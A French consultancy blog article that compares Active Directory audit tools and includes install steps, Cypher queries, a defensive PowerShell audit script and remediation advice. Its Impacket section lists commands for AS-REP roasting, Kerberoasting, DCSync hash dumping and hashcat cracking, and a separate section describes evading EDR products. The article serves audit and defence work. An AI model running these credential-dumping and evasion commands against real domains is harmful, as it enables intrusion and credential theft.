Article Technique Expert\\n

5 outils pour auditer Active Directory : PingCastle (score risque), BloodHound CE, ADRecon, Purple Knight. Comparatif gratuit vs payant, guide RSSI 2026.

\\n
\\n

Comment ce sujet impacte-t-il la sécurité des organisations ?

\\n

Ce sujet a un impact significatif sur la sécurité des organisations car il touche aux fondamentaux de la protection des systèmes d'information. Les entreprises doivent evaluer leur exposition, mettre en place des mesures preventives adaptees et former leurs équipes pour faire face aux risques associes a cette problematique. Analyse technique approfondie des 5 meilleurs outils d. Guide technique complet avec recommandations pratiques et outils pour les professionnels de. Ce guide technique sur top 5 outils audit active s'appuie sur des retours d'expérience terrain et des méthodologies éprouvées en environnement de production.

  • Identification des vecteurs d'attaque et de la surface d'exposition
  • Stratégies de détection et de réponse aux incidents
  • Recommandations de durcissement et bonnes pratiques opérationnelles
  • Impact sur la conformité réglementaire (NIS2, DORA, RGPD)
\\n
\\n
\\n

Quelles sont les bonnes pratiques recommandees par les experts ?

\\n

Les experts recommandent une approche basée sur les risques, incluant l'evaluation reguliere de la posture de sécurité, la mise en place de controles techniques et organisationnels, la formation continue des équipes et l'adoption des referentiels de sécurité reconnus comme ceux du NIST, de l'ANSSI et de l'OWASP.

\\n
\\n
\\n

Pourquoi est-il important de se former sur ce sujet en 2026 ?

\\n

En 2026, la maitrise de ce sujet est devenue incontournable face a l'evolution constante des menaces et des exigences reglementaires. Les professionnels de la cybersécurité doivent maintenir leurs competences a jour pour protéger efficacement les actifs numeriques de leur organisation et repondre aux obligations de conformite.

\\n
\\n

Conclusion : Choisir le Bon Outil pour le Bon Besoin

\\n

Il n'existe pas d'outil parfait qui fait tout. Chaque outil a ses forces :

\\n
    \\n
  • PingCastle : Votre outil de monitoring continu (mensuel)
  • \\n
  • Purple Knight : Pour l'évaluation de résilience et la recherche d'IOCs
  • \\n
  • BloodHound : Indispensable pour le pentest et la recherche d'escalade
  • \\n
  • Adalanche : Alternative moderne pour les environnements complexes
  • \\n
  • ADRecon : Pour la documentation et les audits de conformité
  • \\n
\\n

L'approche recommandée : combinez au minimum PingCastle + BloodHound pour couvrir à la fois les vulnérabilités de configuration et les chemins d'attaque ACL.

\\n

Pour approfondir, consultez les ressources officielles : Microsoft Active Directory, MITRE ATT&CK - Privilege Escalation et ANSSI.

\\n

Sources et références : CERT-FR · MITRE ATT&CK

\\n\\n
\\n
\\n447
PAGES
\\n
\\n
\\n
Guide Gratuit : Sécuriser Active Directory (447 pages)
\\n
Attaques, Tiering Model, durcissement, monitoring — par Ayi NEDJIMI
\\n
\\nTélécharger le PDF →\\n
\\n

? Ressources Complémentaires

\\n\\n
\\n

Cet article vous a été utile ? Partagez-le avec vos équipes sécurité.

Retour terrain

Dans mes missions d'audit, je rencontre régulièrement la même configuration à risque : des règles de firewall héritées depuis 5 à 10 ans, que personne n'ose supprimer par crainte de casser quelque chose. J'ai développé une méthode de nettoyage progressive — analyser les logs de connexion sur 90 jours, identifier les règles sans trafic, les désactiver sans supprimer pendant 30 jours, puis valider avec les équipes métier. Sur un parc de 340 règles dans un groupe logistique, nous en avons supprimé 218 sans incident.

\\n

© 2025 Ayi NEDJIMI Consultants - Tous droits réservés

\\n
\\n

Article suivant recommandé

Top 10 des Attaques - Guide Pratique Cybersécurité →

Découvrez le Top 10 des attaques Active Directory les plus dangereuses en 2025. Guide détaillé sur les techniques d Top

Essayez l'application

ad-attack-explorer

Explorateur d'attaques Active Directory

Voir →

Commandes concrètes pour chaque outil d'audit AD

La différence entre un audit AD superficiel et un audit exploitable tient souvent à la maîtrise des commandes avancées. Voici les invocations précises pour les cinq outils incontournables, avec les pièges d'installation et les résultats attendus.

BloodHound 4.x — Collecte et analyse des chemins d'attaque

BloodHound repose sur Neo4j (graphe) et SharpHound (collecteur C#). Installation en 2026 :

# Installation BloodHound Community Edition (Docker recommandé)
git clone https://github.com/SpecterOps/BloodHound.git
cd BloodHound/examples/docker-compose/
docker compose up -d
# Interface : http://localhost:8080 (admin/BloodHound par défaut)

# Collecte avec SharpHound (depuis un poste joint au domaine)
.\SharpHound.exe -c All --outputdirectory C:\Temp\BH --zipfilename audit_$(Get-Date -f yyyyMMdd)

# Collecte silencieuse (moins de bruit réseau)
.\SharpHound.exe -c DCOnly,ObjectProps --stealth --randomfilenames

Piège d'installation : Neo4j 5.x requiert Java 17. Si l'environnement utilise Java 11, BloodHound plante silencieusement. Vérifier avec java -version avant l'installation. Sur Windows, le collecteur SharpHound peut déclencher Windows Defender — l'exclure du répertoire de travail ou signer l'exécutable avec un certificat interne.

Requêtes Cypher critiques à exécuter en premier :

// Tous les chemins vers DA depuis les utilisateurs standards
MATCH p=shortestPath((u:User {enabled:true})-[*1..]->(g:Group {name:"DOMAIN [email protected]"})) RETURN p LIMIT 25

// Comptes avec DCSync rights (dangereux)
MATCH (n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN n.name, labels(n)

// Kerberoastable accounts avec AdminCount=1
MATCH (u:User {hasspn:true, admincount:true, enabled:true}) RETURN u.name, u.serviceprincipalnames

PingCastle — Score de risque et conformité

PingCastle génère un rapport HTML avec un score de risque AD de 0 à 100 (100 = AD le plus dangereux). La version Community est suffisante pour les audits internes ; la version Enterprise ajoute le suivi temporel et les rapports de conformité ANSSI.

# Audit complet du domaine courant
PingCastle.exe --healthcheck --server dc01.domaine.local

# Audit de toutes les relations de confiance (forest)
PingCastle.exe --healthcheck --explore-trust

# Mode consolidé pour forêts multi-domaines
PingCastle.exe --consolidation

# Export CSV des vulnérabilités pour ticketing
PingCastle.exe --healthcheck --no-enum-limit --level Full

Piège courant : PingCastle nécessite des droits de lecture sur le contexte de nommage (DN base). Un compte de service standard suffit. Si le score dépasse 80, les règles à traiter en priorité sont S-ADRegistration (enregistrement non contrôlé dans l'AD), P-DomainTrustProtected (trusts sans SID filtering) et T-DCRegistration (DCs sans préauthentification Kerberos).

Impacket — Exploitation en boîte noire

Suite Python d'outils pour les protocoles Windows. Indispensable pour tester les attaques Kerberos, NTLM relay et SMB depuis Linux :

# Installation (environnement Python virtuel recommandé)
pip install impacket

# ASREPRoasting — comptes sans pré-auth Kerberos
python3 GetNPUsers.py DOMAINE/ -usersfile users.txt -no-pass -format hashcat -outputfile asrep.txt

# Kerberoasting — extraction des TGS
python3 GetUserSPNs.py DOMAINE/utilisateur:motdepasse -request -outputfile kerberoast.txt

# DCSync (requiert droits réplication)
python3 secretsdump.py DOMAINE/DA:motdepasse@dc01 -just-dc-ntlm -outputfile hashes.txt

# Crack avec hashcat
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule

Adalanche — Alternative graphique open-source

Adalanche est une alternative à BloodHound écrite en Go, sans dépendance Neo4j. Elle analyse les ACL de l'AD et produit des visualisations de chemins d'escalade de privilèges :

# Collecte (exécutable Go standalone, aucune dépendance)
adalanche collect activedirectory --domain DOMAINE.LOCAL --server 10.0.0.1

# Analyse locale (pas de Neo4j requis)
adalanche analyze --datapath ./adalanche-data

Pièges EDR et techniques de contournement

Les EDR modernes (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) détectent les collecteurs AD via plusieurs signatures :

  • SharpHound : détecté via les appels LDAP massifs (requêtes de pagination LDAP > 1000 objets en moins de 60 secondes). Contournement : paramètre --throttle 1000 --jitter 20 pour espacer les requêtes
  • Impacket : la signature réseau des requêtes DCSync est connue. Sur les environnements EDR matures, utiliser l'extraction via VSS (Volume Shadow Copy) ou des outils natifs (NTDSUtil)
  • Exécution en mémoire : charger SharpHound via Invoke-BloodHound (PowerShell Empire / Covenant) pour éviter le drop sur disque

Automatiser l'audit AD : script PowerShell de collecte et rapport

Un audit AD ponctuel ne suffit pas. Les environnements AD évoluent en permanence : nouvelles délégations, comptes de service créés, GPO modifiées. Automatiser la collecte hebdomadaire permet de détecter les dérives de configuration avant qu'elles deviennent des vecteurs d'attaque.

Script PowerShell d'audit AD automatisé

# AD-AutoAudit.ps1 — Collecte hebdomadaire des indicateurs de risque AD
# Requis : module ActiveDirectory, droits lecture domaine

$ReportDate = Get-Date -Format "yyyy-MM-dd"
$OutputDir = "C:\AuditAD\$ReportDate"
New-Item -ItemType Directory -Path $OutputDir -Force | Out-Null

# 1. Comptes inactifs depuis 90 jours (potentiel vecteur)
$InactiveDate = (Get-Date).AddDays(-90)
Get-ADUser -Filter {LastLogonDate -lt $InactiveDate -and Enabled -eq $true} `
-Properties LastLogonDate,PasswordLastSet | `
Select-Object Name,SamAccountName,LastLogonDate,PasswordLastSet | `
Export-Csv "$OutputDir\comptes-inactifs.csv" -NoTypeInformation

# 2. Comptes avec mot de passe qui n'expire jamais
Get-ADUser -Filter {PasswordNeverExpires -eq $true -and Enabled -eq $true} `
-Properties PasswordNeverExpires,PasswordLastSet | `
Select-Object Name,SamAccountName,PasswordLastSet | `
Export-Csv "$OutputDir\mdp-no-expire.csv" -NoTypeInformation

# 3. Membres des groupes à privilèges élevés
$PrivGroups = @("Domain Admins","Enterprise Admins","Schema Admins","Backup Operators","Account Operators")
foreach ($grp in $PrivGroups) {
Get-ADGroupMember -Identity $grp -Recursive | `
Select-Object @{N="Groupe";E={$grp}},Name,SamAccountName,objectClass | `
Export-Csv "$OutputDir\groupes-privilegies.csv" -Append -NoTypeInformation
}

# 4. Comptes Kerberoastable (SPN configuré)
Get-ADUser -Filter {ServicePrincipalName -like "*" -and Enabled -eq $true} `
-Properties ServicePrincipalName,PasswordLastSet | `
Select-Object Name,SamAccountName,ServicePrincipalName,PasswordLastSet | `
Export-Csv "$OutputDir\kerberoastable.csv" -NoTypeInformation

# 5. GPO sans lien (orphelines = risque de réactivation)
Get-GPO -All | Where-Object {(Get-GPOReport -Guid $_.Id -ReportType XML) -notmatch "LinkedTo"} | `
Select-Object DisplayName,CreationTime,ModificationTime | `
Export-Csv "$OutputDir\gpo-orphelines.csv" -NoTypeInformation

# 6. Rapport HTML synthétique
$InactiveCount = (Import-Csv "$OutputDir\comptes-inactifs.csv").Count
$NoExpireCount = (Import-Csv "$OutputDir\mdp-no-expire.csv").Count
$KerbCount = (Import-Csv "$OutputDir\kerberoastable.csv").Count
$HTML = @"
<html><body><h1>Rapport Audit AD — $ReportDate</h1>
<p>Comptes inactifs 90j : $InactiveCount | MDP no-expire : $NoExpireCount | Kerberoastable : $KerbCount</p>
</body></html>
"@
$HTML | Out-File "$OutputDir apport.html"
Write-Host "Audit terminé. Rapports dans $OutputDir"

Ce script peut être programmé via une tâche planifiée Windows sur un poste d'administration. Les CSV sont exploitables directement dans Excel ou importables dans un SIEM (Splunk, Elastic) pour le suivi temporel des indicateurs.

Tableau comparatif des 5 outils d'audit AD

OutilTypeLicenceOSDétection EDRPoints fortsLimitation
BloodHoundGraphe cheminsOpen Source (Apache 2)Win/LinuxÉlevée (SharpHound)Visualisation chemins d'attaqueDépendance Neo4j/Docker
PingCastleScore risqueFreemiumWindowsFaibleRapport dirigeant, score 0-100Pas de chemins graphiques
ImpacketExploitationOpen Source (MIT)LinuxMoyenneSuite complète protocoles WindowsPython, courbe apprentissage
AdalancheGraphe ACLOpen Source (GPLv3)Win/LinuxFaibleSans Neo4j, go standaloneMoins mature que BloodHound
AD ACL ScannerACL/délégationsOpen SourceWindowsTrès faibleAnalyse délégations fineInterface basique PowerShell

Pour aller plus loin

  • BloodHound Enterprise (SpecterOps) — version commerciale avec suivi en temps réel des chemins d'attaque
  • Purple Knight (Semperis) — outil gratuit d'évaluation AD avec 150+ indicateurs, complémentaire à PingCastle
  • Microsoft Entra ID Protection — pour les environnements hybrides AD/Azure, détecte les comportements anormaux sur les identités
  • Formation CRTE (Certified Red Team Expert) de Altered Security — spécialisée attaques AD avancées en environnement lab réaliste

Points clés à retenir

  • Contexte : Top 5 des Outils : Stratégies de Detection et de Remediation — un sujet critique pour la cybersécurité des organisations
  • Impact : Les risques identifiés peuvent compromettre la confidentialité, l'intégrité et la disponibilité des systèmes
  • Action recommandée : Évaluer votre exposition et mettre en place les contrôles de sécurité appropriés

Analyse technique approfondie

L'examen détaillé de cette problématique révèle plusieurs couches de complexité que les organisations doivent appréhender pour se protéger efficacement. Les mécanismes techniques sous-jacents exploitent des faiblesses architecturales qui persistent dans de nombreux environnements de production. La compréhension de ces mécanismes est essentielle pour concevoir des contre-mesures adaptées et dimensionner correctement les investissements en sécurité. Les retours d'expérience terrain montrent que les organisations ayant investi dans la compréhension approfondie de ces menaces réduisent significativement leur surface d'attaque et leur temps de détection des incidents. La mise en place d'une surveillance continue et de processus d'amélioration itératifs permet de maintenir un niveau de protection adapté face à l'évolution constante des techniques d'attaque.

Impact sur les organisations et la continuité d'activité

Les conséquences d'une exploitation réussie de cette vulnérabilité s'étendent bien au-delà du périmètre technique initial. L'impact financier direct inclut les coûts de réponse à incident, de notification des parties prenantes et de restauration des systèmes. L'impact indirect comprend la perte de confiance des clients, les pénalités réglementaires potentielles au titre du RGPD ou de NIS2, et la perturbation des opérations métier. Les études récentes estiment le coût moyen d'une violation de données à 4,45 millions de dollars, un chiffre en augmentation constante depuis cinq ans. Les organisations doivent intégrer ces risques dans leur analyse d'impact sur l'activité et dimensionner leurs plans de continuité en conséquence.

Plan de remédiation et mesures correctives

La remédiation de cette problématique nécessite une approche structurée en plusieurs phases. En priorité immédiate, les équipes de sécurité doivent identifier les systèmes exposés, appliquer les correctifs disponibles et mettre en place des règles de détection temporaires. À moyen terme, il convient de renforcer l'architecture de sécurité par la segmentation réseau, le durcissement des configurations et le déploiement de solutions de monitoring avancées. À long terme, l'adoption d'une approche Zero Trust, la formation continue des équipes et l'intégration de la sécurité dans les processus DevOps permettent de réduire structurellement la surface d'attaque et d'améliorer la résilience globale de l'infrastructure.

Surface d'attaque : Ensemble des points d'entrée exploitables par un attaquant pour compromettre un système, incluant les services exposés, les interfaces utilisateur et les API.

Les techniques décrites dans cet article sont présentées à des fins éducatives et défensives uniquement. Toute utilisation non autorisée sur des systèmes tiers constitue une infraction pénale.

\\n\n

Intégration des outils AD dans un workflow d'audit continu

\n

L'audit Active Directory ne doit plus être un exercice ponctuel annuel mais un processus continu intégré dans la posture de sécurité. L'intégration de BloodHound Community Edition dans un pipeline automatisé — collecte hebdomadaire via SharpHound, import dans Neo4j, détection automatique des nouveaux chemins d'attaque — permet de détecter en temps quasi-réel les dérives de configuration introduites par les changements IT. Une baseline des paths critiques doit être établie après l'audit initial, toute nouvelle connexion entre un compte non-privilégié et un domaine admin déclenchant une alerte.

\n

Pour les organisations sous NIS 2 ou opérant dans des secteurs réglementés, l'audit continu AD génère les preuves nécessaires à la conformité. Les rapports exportés depuis PingCastle (score global, évolution mensuelle des risques, liste des contrôles échoués) constituent des artefacts de conformité acceptables pour démontrer la surveillance continue lors d'un audit de certification ISO 27001. La combinaison PingCastle (scoring) + BloodHound (chemins d'attaque) + PowerView (vérification ponctuelle) couvre 90% des scénarios d'audit AD rencontrés en pratique.

\n

Les techniques avancées d'audit AD exploitent les relations de confiance inter-forêts et les délégations Kerberos comme vecteurs d'escalade de privilèges. La délégation Kerberos non contrainte (Unconstrained Delegation) reste l'une des misconfiguration les plus critiques dans les environnements Active Directory : tout service ou ordinateur configuré avec cette délégation peut impersonner n'importe quel utilisateur qui s'y authentifie, y compris les comptes Domain Admin. La détection avec PowerView est simple : `Get-DomainComputer -Unconstrained`. La remédiation consiste à basculer vers la délégation contrainte basée sur les ressources (RBCD) qui limite l'impersonation aux ressources explicitement définies.

Les ACL (Access Control Lists) d'Active Directory représentent une source infinie de chemins d'attaque sous-exploités dans les audits traditionnels. BloodHound identifie automatiquement les ACL dangereuses comme WriteOwner, WriteDACL ou GenericWrite sur des comptes ou groupes privilégiés. Un compte standard avec WriteOwner sur le groupe Domain Admins peut s'y ajouter en quelques étapes. L'audit systématique des ACL avec la commande BloodHound `Shortest Paths to Domain Admins` révèle invariablement des chemins d'escalade insoupçonnés dans les organisations qui n'ont jamais procédé à un audit AD approfondi.

Bonnes pratiques de sécurisation post-audit Active Directory

Un audit AD sans plan de remédiation structuré est une opportunité manquée. Après l'exécution des outils d'audit et l'identification des vulnérabilités, les équipes sécurité doivent prioriser les actions selon un cadre d'urgence clair.

Priorisation des remédiations

La méthode DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability) appliquée aux vulnérabilités AD permet une priorisation objective. Les cinq remédations prioritaires identifiées dans la majorité des audits AD sont :

  • Désactiver NTLMv1 — via GPO : Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options > "Network security: LAN Manager authentication level" = "Send NTLMv2 response only"
  • Activer Protected Users — ajouter tous les comptes à privilèges au groupe Protected Users (bloque NTLMv1, délégation Kerberos, mémorisation credentials)
  • Remplacer les mots de passe de service faibles — migrer vers des gMSA (Group Managed Service Accounts) dont les mots de passe de 240 bits sont gérés automatiquement par l'AD
  • Auditer les GPO — avec Advanced Group Policy Management (AGPM) ou le module PowerShell GroupPolicy pour identifier les GPO modifiées récemment et les permissions anormales
  • Implémenter le tiering AD — séparer les comptes administrateurs en trois niveaux : Tier 0 (contrôleurs de domaine), Tier 1 (serveurs), Tier 2 (postes de travail) avec des bastions dédiés à chaque niveau

Surveillance continue post-audit

Une fois les vulnérabilités critiques remédiées, mettre en place une surveillance continue avec les événements Windows suivants dans votre SIEM :

  • 4625 — Échecs d'authentification (détection password spraying)
  • 4768 / 4769 — Demandes de tickets Kerberos (AS-REQ / TGS-REQ), volume anormal = Kerberoasting potentiel
  • 4662 — Accès aux objets AD avec droits DS-Replication = DCSync potentiel
  • 4728 / 4732 / 4756 — Ajouts aux groupes à privilèges (Domain Admins, Administrators)
  • 7045 — Installation d'un nouveau service (vecteur de persistance classique)

Questions fréquentes sur l'audit Active Directory

L'audit Active Directory soulève des questions récurrentes chez les RSSI et les équipes IT. Voici les réponses aux interrogations les plus fréquentes.

Quelle est la fréquence recommandée pour un audit AD ?

L'ANSSI recommande un audit AD complet une fois par an pour les organisations sans OIV, et une surveillance continue avec des contrôles trimestriels pour les OIV/OSE. En pratique, les entreprises ayant un AD mature combinent un audit annuel par un PASSI externe et des contrôles internes automatisés hebdomadaires (script PowerShell, PingCastle planifié). Les événements déclencheurs d'un audit hors calendrier incluent : tout incident de sécurité, une fusion-acquisition, un changement d'infrastructure majeur ou une notification de compromission par un CERT.

BloodHound peut-il être utilisé sans compte de domaine ?

Non, BloodHound nécessite des credentials de domaine valides pour collecter les données LDAP. Il peut fonctionner avec un compte utilisateur standard (non-admin) pour la collecte de base, mais certaines données (sessions actives, GPO avancées) nécessitent des droits supplémentaires. En test d'intrusion sans credentials, la phase préliminaire consiste à obtenir un premier compte via phishing ou exploitation d'un service exposé.

PingCastle est-il suffisant pour un audit complet ?

PingCastle est excellent pour un premier bilan rapide (30 minutes d'exécution, rapport HTML immédiat), mais il ne remplace pas un audit complet. Il ne teste pas les mots de passe faibles (Kerberoasting), ne visualise pas les chemins d'attaque graphiquement (BloodHound), ni ne vérifie les configurations ADCS. La combinaison PingCastle + BloodHound + Impacket couvre 95% des vecteurs AD documentés dans MITRE ATT&CK.

\\n
Ayi NEDJIMI
\\n

Renforcez votre posture de sécurité

\\n

Audit, pentest, formation, conseil — une approche sur-mesure adaptée à votre contexte.

\\n\\n
\\n
\\n

Audit Active Directory par un expert certifié

\\n

Au-delà des outils présentés dans ce guide, un audit Active Directory complet nécessite une méthodologie structurée : énumération BloodHound, test Kerberoasting, Pass-the-Hash et DCSync, audit des délégations et des GPO. Notre équipe OSCP réalise ces audits avec remise d'un rapport de vulnérabilités et plan de remédiation priorisé. Consultez aussi notre comparatif des 5 meilleurs outils d'audit AD.

\\n